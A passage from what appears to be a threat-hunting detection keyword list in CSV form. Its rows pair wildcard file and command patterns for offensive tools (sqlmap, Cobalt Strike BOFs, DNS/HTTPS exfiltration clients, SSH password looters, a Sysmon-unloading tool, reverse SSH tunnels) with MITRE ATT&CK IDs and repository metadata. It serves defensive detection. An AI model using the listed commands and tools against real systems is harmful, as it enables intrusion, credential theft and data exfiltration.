tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*sqlmapapi -*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmapapi.py","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmapapi.py*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network 
Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" +"*sqlmapproject/sqlmap*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*SQLmate*","offensive_tool_keyword","SQLmate","A friend of SQLmap which will do what you always expected from SQLmap.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Web Attacks","https://github.com/s0md3v/sqlmate","1","1","N/A","N/A","4","393","119","2019-05-05T15:53:06Z","2017-10-19T19:55:58Z" +"*sqlninja*","offensive_tool_keyword","sqlninja","...a SQL Server injection & takeover tool","T1505 - T1526 - T1583 - T1588 - T1590","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Web Attacks","http://sqlninja.sourceforge.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*SQLRecon.exe*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" +"*SQLRecon.git*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" +"*SQLServer_Accessible_PotentialSensitiveData.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 
- T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*SQLServer_DefaultLogin.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*src/cracker.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/genmkvpwd.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/john.asm*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*src/obfuscator.c*","offensive_tool_keyword","Striker","Striker is a simple Command and 
Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*src/Remote/chromeKey/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/lastpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_config/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_create/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_delete/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 
- T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_start/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/ShellGhost.c*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*Src/Spray-AD*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*src/tests/NESSIE/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/xmrig.cpp*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*src/zerologon.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" +"*src\unhook.c*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*src\unhook.c*","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/unhook-bof","1","0","N/A","10","10","240","61","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z" +"*src\xmrig.cpp*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*srde dns 
-*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde_release dns -k *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde_release https -i *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srvsvc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 
- T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*ss -tunlp || netstat -tunlp*127.0.0.1*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*ssf.exe -D * -p * 127.0.0.1*","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","10","10","1502","240","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z" +"*ssfd.exe -p *","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","10","10","1502","240","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z" +"*ssh @ssh.*.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across 
the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*ssh -N -R 4567:localhost:*root*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*ssh2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ssh2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*sshame*","offensive_tool_keyword","sshame","tool to brute force SSH public-key authentication","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/HynekPetrak/sshame","1","0","N/A","N/A","1","65","15","2023-04-17T12:44:57Z","2019-08-25T16:50:56Z" +"*ssh-auditor*","offensive_tool_keyword","ssh-auditor","The best way to scan for weak ssh passwords on your network.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ncsa/ssh-auditor","1","0","N/A","N/A","6","582","87","2023-02-25T01:34:02Z","2016-11-08T22:47:38Z" +"*sshbrute.py*","offensive_tool_keyword","burpsuite","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive 
tools used in the red-teaming together","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z" +"*SSHBruteForce.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*sshkey_persistence.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*sshLooterC*","offensive_tool_keyword","sshLooterC","script to steel password from ssh - Its the C version of sshLooter. which was written in python and have a lot of dependencies to be installed on the infected machine. Now with this C version. you compile it on your machine and send it to the infected machine without installing any dependencies.","T1003 - T1059 - T1083 - T1566 - T1558.003","TA0002 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mthbernardes/sshLooterC","1","1","N/A","N/A","3","246","72","2023-06-08T21:12:10Z","2018-12-19T20:25:11Z" +"*ssh-mitm*","offensive_tool_keyword","ssh-mitm","An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.","T1040 - T1071 - T1552","TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/jtesta/ssh-mitm","1","1","N/A","N/A","10","1548","210","2021-07-02T02:17:26Z","2017-05-16T19:55:10Z" +"*sshmon*hunt*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" +"*sshmon*kill*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense 